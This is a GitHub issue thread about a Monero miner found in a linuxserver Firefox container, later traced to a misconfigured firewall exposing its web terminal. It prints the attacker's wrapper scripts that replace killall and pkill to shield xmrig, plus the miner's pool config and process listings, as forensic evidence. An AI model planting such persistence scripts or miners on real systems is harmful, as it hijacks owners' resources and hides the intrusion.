[BUG] Monero miner spawned inside linuxserver/firefox instance

[regulatre]

Is there an existing issue for this?

• I have searched the existing issues

Current Behavior

XMRIG, a crypto currency miner, was maliciously spawned by the linuxserver Firefox image. It ran at 100% CPU until terminated. Prior to termination, I backed up the container filesystem for forensic analysis.

# docker images
REPOSITORY                    TAG       IMAGE ID       CREATED       SIZE
lscr.io/linuxserver/firefox   latest    e57be1fc05b6   4 weeks ago   1.63GB

The Monero miner spawned after the container had been up and idle for a week or two (note the dates associated with the process listing below for timeline of events).

The pkill and killall binaries had been replaced with bash scripts that prevent the termination of the xmrig process, highlighting the fact that xmrig is intended to run maliciously.

$ cat usr/bin/killall
#!/bin/bash

if [[ "$1" == "xmrig" || "$1" == "xmr_linux_amd64" || "$1" == "xmr_linux_arm64" ]]; then
    exit 1
else
    killall.bak "$@"
fi



$ cat usr/bin/pkill
#!/bin/bash

if [[ "$1" == "xmrig" || "$1" == "xmr_linux_amd64" || "$1" == "xmr_linux_arm64" ]]; then
    exit 1
else
    pkill.bak "$@"
fi

Below is the pool config associated with the xmrig instance that was running.

$ cat ./xmrig/xmrig-6.21.3/config.json
<snip>
"pools": [
    {
        "algo": "rx/0",
        "coin": null,
        "url": "141.94.96.144:9000",
        "user": "4AJZZv3rTYzJXT8hUbbyrzdXcTCDt3bWbjk9sDfYSynjM4rUYhUu6NS24psAtzmBYEgzzuXq8xFKTFCpC1AyMdZkTBxmhvj",
        "pass": null,
        "rig-id": "17lifers-vnc-810",
        "nicehash": false,
        "keepalive": true,
        "enabled": true,
        "tls": true,
        "sni": false,
        "tls-fingerprint": null,
        "daemon": false,
        "socks5": null,
        "self-select": null,
        "submit-to-origin": false
    }
],

This is a process listing. Notice how it shows xmrig being spawned by the xterm process, which was spawned by the startwm.sh script.

1000       39442  0.0  5.6 261332 54996 ?        Ssl  Jul30   7:15      |   \_ /usr/local/bin/Xvnc :1 -PublicIP 127.0.0.1 -drinode /dev/dri/renderD128 -disableBasicAuth -SecurityTypes None -AlwaysShared -http-header Cross-Origin-Embedder-Policy=require-corp -http-header Cross-Origin-Opener-Policy=same-origin -geometry 1024x768 -sslOnly 0 -RectThreads 0 -websocketPort 6901 -interface 0.0.0.0 -Log *:stdout:10
root       39313  0.0  0.0    216     0 ?        S    Jul30   0:00      \_ s6-supervise s6rc-fdholder
root       39314  0.0  0.0    216     0 ?        S    Jul30   0:00      \_ s6-supervise svc-cron
root       39438  0.0  0.0   1628   128 ?        Ss   Jul30   0:16      |   \_ busybox crond -f -S -l 5
root       39315  0.0  0.0    216     0 ?        S    Jul30   0:00      \_ s6-supervise svc-de
1000       39466  0.0  0.0   2312   256 ?        Ss   Jul30   0:00      |   \_ /bin/bash /defaults/startwm.sh
1000       39479  0.0  0.4  27984  4248 ?        Sl   Jul30   0:00      |       \_ /usr/bin/openbox --startup /usr/libexec/openbox-autostart OPENBOX
1000       77100  0.0  1.2  17540 11756 ?        S    Aug10   0:45      |           \_ /usr/bin/xterm
1000       77101  0.0  0.0   2624   640 pts/0    Ss   Aug10   0:00      |           |   \_ bash
root       77102  0.0  0.0   1920   256 pts/0    S+   Aug10   0:06      |           |       \_ sudo su
root       77103  0.0  0.0   1916   128 ?        Ss   Aug10   0:00      |           |           \_ sudo su
root       77104  0.0  0.0   1696   256 ?        S    Aug10   0:00      |           |               \_ sh
root       77108  0.0  0.0   1628   128 ?        S+   Aug10   0:00      |           |                   \_ sh /dev/fd/64
root       77137  0.0  0.0   1920   256 ?        S+   Aug10   0:07      |           |                       \_ sudo -n ./xmr_linux_amd64
root       77138  0.0  0.0   1916   128 ?        Ss   Aug10   0:00      |           |                           \_ sudo -n ./xmr_linux_amd64
root       77139  0.4  0.9 1234716 9132 ?        Sl+  Aug10  48:30      |           |                               \_ ./xmr_linux_amd64
root      362361  0.0  0.0   1920   256 ?        S+   Aug17   0:00      |           |                                   \_ sudo -n /tmp/xmrig/xmrig-6.21.3/xmrig
root      362362  0.0  0.0   1916   128 ?        Ss+  Aug17   0:00      |           |                                       \_ sudo -n /tmp/xmrig/xmrig-6.21.3/xmrig
root      362363 42.1 27.4 312032 268160 ?       Sl   Aug17 420:32      |           |                                           \_ /tmp/xmrig/xmrig-6.21.3/xmrig
1000      362234  3.1 18.9 2926180 185064 ?      Sl   Aug17  31:11      |           \_ /usr/lib/firefox/firefox
1000      362276  0.0  0.9 470640  9088 ?        Sl   Aug17   0:00      |               \_ /usr/lib/firefox/firefox -contentproc -parentBuildID 20240606121648 -prefsLen 27477 -prefMapSize 250051 -appDir /usr/lib/firefox/browser {17e15881-8cb7-49a8-9a9e-d4efb28f254f} 261834 true socket
1000      362335  0.8  3.0 2665764 29572 ?       Sl   Aug17   8:31      |               \_ /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 27618 -prefMapSize 250051 -jsInitLen 232064 -parentBuildID 20240606121648 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {7fa35625-521c-4dae-9f33-777b9b319823} 261834 true tab
1000      362380  0.7  2.6 2665752 26092 ?       Sl   Aug17   7:02      |               \_ /usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 32142 -prefMapSize 250051 -jsInitLen 232064 -parentBuildID 20240606121648 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {89828b29-3e40-4823-8f16-dba91d952579} 261834 true tab
1000      363849  0.0  0.9 467064  8832 ?        Sl   02:23   0:00      |               \_ /usr/lib/firefox/firefox -contentproc -parentBuildID 20240606121648 -sandboxingKind 0 -prefsLen 33211 -prefMapSize 250051 -appDir /usr/lib/firefox/browser {a77bc7c4-571c-44f1-9c3f-4b8eec1e0ccd} 261834 true utility

Expected Behavior

Expected Firefox image to be clean, free of malware, including rogue crypto miners.

Steps To Reproduce

docker run -d \
  --rm \
  -e PUID=1000 \
  -e PGID=1000 \
  -e TZ=Etc/UTC \
  -p 3000:3000 \
  lscr.io/linuxserver/firefox:latest

Replace :latest with the tag associated with image ID e57be1fc05b6.

Then let the container sit idle for 3 weeks. At some point the xmrig miner may spawn as it did for me.

Environment

- OS: Linux
- How docker service was installed: Docker.io 24.0.7-0ubuntu2~23.10.1

CPU architecture

x86-64

Docker creation

Container was invoked as one-liner:


docker run -d \
  --rm \
  -e PUID=1000 \
  -e PGID=1000 \
  -e TZ=Etc/UTC \
  -p 3000:3000 \
  lscr.io/linuxserver/firefox:latest

### Container logs

```bash
I'm afraid the logs were lost due to the --rm option used. This sucks, I know.

[github-actions]

Thanks for opening your first issue here! Be sure to follow the relevant issue templates, or risk having this issue marked as invalid.

[j0nnymoe]

Sounds like you had your Firefox container compromised, I would check to make sure you haven't got it exposed without any authentication.

[Roxedus]

Any access to the containers webui also gives access to xterm that's spawned by startvm>openbox, which is why we inquire about if this has been directly exposed to the internet.

[regulatre]

It happened on a server that's completely isolated from the Internet in terms of inbound connections. No outbound firewall rules were in place however. I manage the server using a VPN to which it and I both connect.

[regulatre]

Nothing else runs on the server - no other containers and only the VPN service. Also, only port 3000 was forwarded into the container as shown in the docker run command sample above. In other words, it's not possible that the xterm connection originated from outside of the container. The infection seems to have originated within the container.

[j0nnymoe]

All our code is public, if you really think we've packaged xmrig into our container, that's a bold claim.

[regulatre]

Agreed. Until we find out what spawned the process we don't know who or what spawned it. Nevertheless, the container is a closed environment, except for webvnc port 3000, so the infection (xterm connection) originated from within the container. No plugins or browser add-ons were added. The container was simply started, and used to access a few sites to test connectivity, and then left idle.

I'll spin up a new instance of the container, this time without --rm and I'll add a rolling pcap on the host machine to see if I can reproduce the situation and collect more info if/when it happens again. I'll also check the firefox sqlite history database to look for clues.

In the meantime, others with the container up and running may want to check for xmrig running and ongoing load averages of 1.0+

[aptalca]

All of our code, including the builder logs are public:
https://github.com/linuxserver/docker-firefox
https://ci.linuxserver.io/job/Docker-Pipeline-Builders/job/docker-firefox/

You can find the baseimage codes and build logs by browsing those two as well.

I assure you there is no xmrig process in there.

You're not the first person to experience rogue processes in docker containers.

You most likely got hacked in some way (could even be a separate machine on your network), and the bot/hacker scanned your machines for any processes and containers it could inject stuff into.

You might be using a vpn to access your stuff, but the problem is, you're trusting your lan environment. Once that's breached, it's game over.

I'd recommend securing your machines and services on the lan as well. That's a common reason for implementing zero trust. As a start, you can put your services behind Authelia/Authentik with 2fa, and not map the docker ports on the host directly. Have your reverse proxy (ie. SWAG) connect to the services over the docker network.

[regulatre]

I understand your suggestions about checking for a lan breach but again there is no way in or out of the container from the LAN (local LAN or the server's LAN) except for port 3000 (xvnc). No ports or protocols are open to the Internet, only the VPN, which connects to my vpn server with myself and that server as the only clients. I don't mean to belabor this point, I just want to make sure you don't dismiss this report by assuming that the network was not secured.

I'll do my best to help find the source of the infection. The xmrig binary was dropped into /tmp at 05:05 UTC from an unknown source, likely via xterm as the initial point of entry. Smells like a scheduled task that executed at that time.

I noticed node.js is part of the container, so there is a long list of packages therein that could be infected.

Note that after restarting the container (new, clean process tree shown below), it didn't spawn an xterm yet or by default. Also comparing this process tree to the infected process tree above it's noteworthy that xterm was spawned by openbox.

1000      369298  0.0  0.0   2312   256 ?        Ss   18:45   0:00  |   |   \_ /bin/bash /defaults/startwm.sh
1000      369312  0.0  0.4  27732  4000 ?        Sl   18:45   0:00  |   |       \_ /usr/bin/openbox --startup /usr/libexec/openbox-autostart OPENBOX
1000      369355  0.0  0.0   1628   128 ?        S    18:45   0:00  |   |           \_ /bin/sh /usr/libexec/openbox-autostart OPENBOX
1000      369361  0.0  0.0   1628   128 ?        S    18:45   0:00  |   |               \_ sh /config/.config/openbox/autostart
1000      369362 16.7 30.2 3820924 294736 ?      Rl   18:45   1:06  |   |                   \_ /usr/lib/firefox/firefox
1000      369398  0.0  0.9 470116  9088 ?        Sl   18:45   0:00  |   |                       \_ /usr/lib/firefox/firefox -contentproc -parentBuildID 20240606121648 -prefsLen 20568 -prefMapSize 239698 -appDir /usr/lib/firefox/browser {c390f8a8-fa6b-4c15-82ba-7fc2756a089e} 274 true socket
1000      369425  0.2  2.5 2666904 24948 ?       Sl   18:46   0:00  |   |                       \_ /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 30334 -prefMapSize 239698 -jsInitLen 232064 -parentBuildID 20240606121648 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {9d9856c5-1815-4bd8-9a76-165fd0c2900a} 274 true tab
1000      369443  0.4  3.8 2679136 37648 ?       Sl   18:46   0:01  |   |                       \_ /usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 31564 -prefMapSize 239698 -jsInitLen 232064 -parentBuildID 20240606121648 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {d69c7bd3-7427-41d3-88b9-9b69649aaa93} 274 true tab
1000      369528  0.0  0.9 467364  8960 ?        Sl   18:46   0:00  |   |                       \_ /usr/lib/firefox/firefox -contentproc -parentBuildID 20240606121648 -sandboxingKind 0 -prefsLen 38524 -prefMapSize 239698 -appDir /usr/lib/firefox/browser {5baba9ec-22fb-4a81-8133-45dafb10b0bd} 274 true utility
1000      369856  7.6 10.3 2755700 100732 ?      Rl   18:50   0:08  |   |                       \_ /usr/lib/firefox/firefox -contentproc -childID 10 -isForBrowser -prefsLen 40162 -prefMapSize 239698 -jsInitLen 232064 -parentBuildID 20240606121648 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {b59ec97c-5089-4bbb-b1c4-c20b2bb2fd4e} 274 true tab
1000      369925  4.6  4.5 2683136 44076 ?       Rl   18:50   0:04  |   |                       \_ /usr/lib/firefox/firefox -contentproc -childID 14 -isForBrowser -prefsLen 40162 -prefMapSize 239698 -jsInitLen 232064 -parentBuildID 20240606121648 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {5a42aaac-28d4-434a-abe8-6a27494d6b6f} 274 true tab
1000      369946  3.2  1.4 2647088 14604 ?       Sl   18:51   0:02  |   |                       \_ /usr/lib/firefox/firefox -contentproc -childID 15 -isForBrowser -prefsLen 40162 -prefMapSize 239698 -jsInitLen 232064 -parentBuildID 20240606121648 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {d99211b1-3f04-4468-9a11-ac6c45ca8642} 274 true tab
root      369126  0.0  0.0    216     0 ?        S    18:45   0:00  |   \_ s6-supervise svc-pulseaudio

[quietsy]

Did you check the client machines?
Were there any browser extensions installed or downloaded files?

[quietsy]

likely via xterm as the initial point of entry. Smells like a scheduled task that executed at that time.

xterm is launched by right clicking on the desktop.

[aptalca]

I didn't assume your network was insecure. I suggested it as a potential entry point. You said your container directly exposes port 3000 on the lan. That port allows a user to access a terminal running in the Firefox container.

The only assumption I'm making is that the image we publish does not contain any cryptomining processes.

I linked you all of our sources. Feel free to go through them.

All we're asking is for you not to make any unsubstantiated claims about our images containing xmrig.

Just because you have an xmrig process starting up inside your container, it does not mean we shipped it. There are many other ways it can get in there.

[regulatre]

I found the error, it was user error in the iptables firewall configuration. Port 3000 was indeed being exposed at times to the Internet. Apologies for the confusion, and thanks for your patience.